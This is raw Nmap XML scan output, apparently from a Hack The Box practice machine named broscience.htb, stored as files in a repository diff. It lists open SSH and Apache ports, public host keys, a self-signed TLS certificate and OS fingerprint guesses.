<elem key="pem">-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWd
wUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;</elem>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script><script id="tls-alpn" output="&#xa; http/1.1"><elem>http/1.1</elem>
</script><script id="ssl-date" output="TLS randomness does not represent time"></script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<osmatch name="Linux 4.15 - 5.6" accuracy="94" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="94" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="93" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="93" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="93" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.3" accuracy="92" line="68082">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="92" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="92"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0" accuracy="91" line="68042">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="91"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
</osmatch>
<osmatch name="Crestron XPanel control system" accuracy="91" line="19543">
<osclass type="specialized" vendor="Crestron" osfamily="2-Series" accuracy="91"><cpe>cpe:/o:crestron:2_series</cpe></osclass>
</osmatch>
<osmatch name="Adtran 424RG FTTH gateway" accuracy="90" line="1576">
<osclass type="specialized" vendor="Adtran" osfamily="embedded" accuracy="90"><cpe>cpe:/h:adtran:424rg</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9861%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)&#xa;OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
</os>
<uptime seconds="2473029" lastboot="Wed Jan 4 02:53:32 2023"/>
<distance value="2"/>
<tcpsequence index="261" difficulty="Good luck!" values="AD3A7DAF,7569CE33,8F8AAE03,87127FB0,73479EFC,DD0F05B5"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="9366DC66,9366DCCD,9366DD32,9366DD99,9366DDFE,9366DE62"/>
<trace port="5900" proto="tcp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="25.54"/>
<hop ttl="2" ipaddr="10.10.11.195" rtt="57.25" host="broscience.htb"/>
</trace>
<times srtt="40113" rttvar="17235" to="109053"/>
</host>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<runstats><finished time="1675270241" timestr="Wed Feb 1 17:50:41 2023" summary="Nmap done at Wed Feb 1 17:50:41 2023; 1 IP address (1 host up) scanned in 62.65 seconds" elapsed="62.65" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,180 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.195" start="1675270179" startstr="Wed Feb 1 17:49:39 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,521
4,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="SYN Stealth Scan" time="1675270179"/>
<taskend task="SYN Stealth Scan" time="1675270180" extrainfo="1000 total ports"/>
<taskbegin task="Service scan" time="1675270180"/>
<taskend task="Service scan" time="1675270192" extrainfo="3 services on 1 host"/>
<taskbegin task="Traceroute" time="1675270196"/>
<taskend task="Traceroute" time="1675270196"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1675270196"/>
<taskend task="Parallel DNS resolution of 1 host." time="1675270207"/>
<taskbegin task="NSE" time="1675270207"/>
<taskend task="NSE" time="1675270212"/>
<taskbegin task="NSE" time="1675270212"/>
<taskend task="NSE" time="1675270213"/>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<host starttime="1675270179" endtime="1675270213"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="997">
<extrareasons reason="reset" count="997" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,444-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200
,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)&#xa;ssh-rsa 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&#xa; 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=&#xa; 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN"><table>
<elem key="type">ssh-rsa</elem>
<elem key="key">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</elem>
<elem key="bits">3072</elem>
<elem key="fingerprint">df17c6bab18222d91db5ebff5d3d2cb7</elem>
</table>
<table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">3f8a56f8958faeafe3ae7eb880f679d2</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN</elem>
<elem key="bits">256</elem>
<elem key="fingerprint">3c6575274ae2ef9391374cfdd9d46341</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" hostname="broscience.htb" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-title" output="Did not follow redirect to https://broscience.htb/"><elem key="redirect_url">https://broscience.htb/</elem>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" extrainfo="(Debian)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="ssl-date" output="TLS randomness does not represent time"></script><script id="tls-alpn" output="&#xa; http/1.1"><elem>http/1.1</elem>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script><script id="ssl-cert" output="Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb&#xa;Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb&#xa;Public Key type: rsa&#xa;Public Key bits: 4096&#xa;Signature Algorithm: sha256WithRSAEncryption&#xa;Not valid before: 2022-07-14T19:48:36&#xa;Not valid after: 2023-07-14T19:48:36&#xa;MD5: 5328ddd62f3429d11d26ae8a68d86e0c&#xa;SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b&#xa;-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vM
UiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;"><table key="subject">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="issuer">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="pubkey">
<elem key="type">rsa</elem>
<elem key="bits">4096</elem>
<elem key="modulus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elem>
<elem key="exponent">65537</elem>
</table>
<table key="extensions">
<table>
<elem key="name">X509v3 Subject Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Authority Key Identifier</elem>
